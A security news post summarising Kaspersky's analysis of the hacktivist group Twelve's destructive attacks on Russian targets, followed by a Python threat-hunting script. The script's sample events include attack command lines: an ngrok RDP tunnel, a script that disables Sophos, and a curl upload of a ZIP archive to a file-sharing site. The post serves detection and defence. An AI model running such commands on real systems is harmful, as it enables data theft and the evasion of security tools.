Hacktivist Group Twelve Targets Russian Entities with Destructive Cyber Attacks

A hacktivist group known as Twelve has been observed executing destructive cyber attacks against Russian targets using an arsenal of publicly available tools, according to a recent analysis by cybersecurity firm Kaspersky.

Unlike ransomware groups that demand payment to decrypt data, Twelve takes a more destructive approach. "Rather than demand a ransom for decrypting data, Twelve prefers to encrypt victims' data and then destroy their infrastructure with a wiper to prevent recovery," Kaspersky reported on Friday. "The approach is indicative of a desire to cause maximum damage to target organizations without deriving direct financial benefit."

Formed in April 2023, likely in response to the ongoing Russo-Ukrainian war, Twelve has consistently launched attacks designed to cripple networks and disrupt business operations. In addition to its destructive capabilities, the group also engages in hack-and-leak operations, exfiltrating sensitive data and sharing it on its Telegram channel.

Kaspersky’s analysis revealed that Twelve shares similarities with DARKSTAR, a ransomware group also known as COMET or Shadow, suggesting that the two groups might be related or part of the same operational cluster. "While Twelve's actions are clearly hacktivist, DARKSTAR follows the traditional double extortion model," Kaspersky noted, highlighting the complexity of modern cyberthreats.

Attack Tactics

Twelve’s attack chains often begin with the exploitation of valid local or domain accounts, followed by the use of Remote Desktop Protocol (RDP) for lateral movement. Some attacks are carried out by first gaining access to contractors' systems and using their certificates to connect to a customer's virtual private network (VPN).

Prominent among the tools in Twelve’s arsenal are:

  • Cobalt Strike
  • Mimikatz
  • Chisel
  • BloodHound
  • PowerView
  • CrackMapExec
  • Advanced IP Scanner
  • PsExec

These tools are used for credential theft, network discovery, privilege escalation, and mapping. In many cases, malicious RDP connections are tunneled through ngrok.

Additionally, Twelve deploys PHP web shells like WSO, which allow the execution of arbitrary commands, file transfers, and email sending. These web shells are publicly accessible on platforms like GitHub.

Notable Attack Instances

In one high-profile incident, the group exploited known vulnerabilities in VMware vCenter (CVE-2021-21972 and CVE-2021-22005) to install a web shell, which was then used to deliver a backdoor dubbed FaceFish.

The attackers also used PowerShell to manipulate Access Control Lists (ACLs) for Active Directory objects, adding domain users and groups. To evade detection, they disguised their malware using names like "Update Microsoft," "Yandex," and "intel.exe."

Twelve’s attacks are further characterized by the use of a PowerShell script (“Sophos_kill_local.ps1”) to disable Sophos security software on compromised hosts.

The final stages of Twelve’s attacks involve launching ransomware and wiper payloads via Windows Task Scheduler. Before these destructive measures, the group exfiltrates sensitive information, compressing it into ZIP archives and uploading them to a file-sharing service called DropMeFiles.

The ransomware used is a version of LockBit 3.0, compiled from publicly available source code, which terminates processes that might interfere with encryption. Meanwhile, the wiper malware, similar to Shamoon, rewrites the master boot record (MBR) on connected drives, irreversibly overwriting file contents with random data.

Kaspersky's findings underscore that Twelve relies heavily on publicly available tools rather than creating custom malware. "This makes it possible to detect and prevent Twelve's attacks in due time," the company noted, urging organizations to remain vigilant against such threats.
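Because the tradecraft above is built from public tools and fixed names, it is easy to turn into hunt logic. The following is an added example, not code from Kaspersky's report or from this post: a small Python hunt that runs the indicators named in the article (ngrok-tunneled RDP, the Sophos_kill_local.ps1 script, vendor-lookalike binary names, Task Scheduler launching the final payload, ZIP uploads to DropMeFiles) over constructed Sysmon-style process-creation events. The event field names, the trusted-directory allow-list and the dropmefiles.com domain are assumptions.

```python
import ntpath
import re

# Constructed Sysmon-style process-creation events (sample data, not real telemetry).
EVENTS = [
    {"host": "srv01", "image": r"C:\Users\Public\ngrok.exe", "cmdline": "ngrok.exe tcp 3389",
     "parent": r"C:\Windows\System32\cmd.exe", "parent_cmdline": "cmd.exe"},
    {"host": "dc01", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell.exe -ep bypass -File C:\Temp\Sophos_kill_local.ps1",
     "parent": r"C:\Windows\explorer.exe", "parent_cmdline": "explorer.exe"},
    {"host": "fs02", "image": r"C:\ProgramData\intel.exe", "cmdline": "intel.exe",   # Task Scheduler launch
     "parent": r"C:\Windows\System32\svchost.exe", "parent_cmdline": "svchost.exe -k netsvcs -p -s Schedule"},
    {"host": "fs02", "image": r"C:\Program Files\Intel\Driver\intel.exe", "cmdline": "intel.exe --service",
     "parent": r"C:\Windows\System32\services.exe", "parent_cmdline": "services.exe"},
    {"host": "fs02", "image": r"C:\Windows\System32\curl.exe", "parent": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"curl.exe -F file=@C:\Temp\finance.zip https://dropmefiles.com/", "parent_cmdline": "cmd.exe"},
]

DISGUISED_STEMS = {"intel", "yandex", "update microsoft"}  # benign-looking names the report attributes to Twelve
TRUSTED_DIRS = ("c:\\windows\\", "c:\\program files\\", "c:\\program files (x86)\\")  # assumed allow-list

def in_trusted_dir(image):
    return image.lower().startswith(TRUSTED_DIRS)

def stem(image):
    return ntpath.splitext(ntpath.basename(image))[0].lower()

RULES = {
    # RDP tunneled through ngrok: the tunnel client itself is the tell, wherever it runs from.
    "rdp_tunnel_via_ngrok": lambda e: stem(e["image"]) == "ngrok" or bool(re.search(r"\bngrok\b", e["cmdline"], re.I)),
    # The Sophos-disabling script named in the report.
    "sophos_kill_script": lambda e: "sophos_kill_local.ps1" in e["cmdline"].lower(),
    # Vendor-looking name running outside OS/vendor directories; a genuine intel.exe under Program Files stays quiet.
    "disguised_binary_name": lambda e: stem(e["image"]) in DISGUISED_STEMS and not in_trusted_dir(e["image"]),
    # Task Scheduler (svchost -s Schedule) launching a binary from an untrusted path: the ransomware/wiper stage.
    "scheduled_task_payload": lambda e: "-s schedule" in e["parent_cmdline"].lower() and not in_trusted_dir(e["image"]),
    # A staged ZIP being pushed to the file-sharing service used for exfiltration (dropmefiles.com is an assumed domain).
    "dropmefiles_exfil": lambda e: "dropmefiles" in e["cmdline"].lower() and ".zip" in e["cmdline"].lower(),
}

def hunt(events):
    """Return one (host, rule, image) tuple for every rule each event trips, in event order."""
    return [(e["host"], name, e["image"]) for e in events for name, hit in RULES.items() if hit(e)]

if __name__ == "__main__":
    for host, rule, image in hunt(EVENTS):
        print(f"{host}: {rule} <- {image}")
```

The fourth event shows why the path check matters: the same intel.exe name under Program Files produces no alert, while the copy in ProgramData trips both the name rule and the scheduled-task rule.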

© 2016 - 2025 Red Secure Tech Ltd. Registered in England and Wales under Company Number: 15581067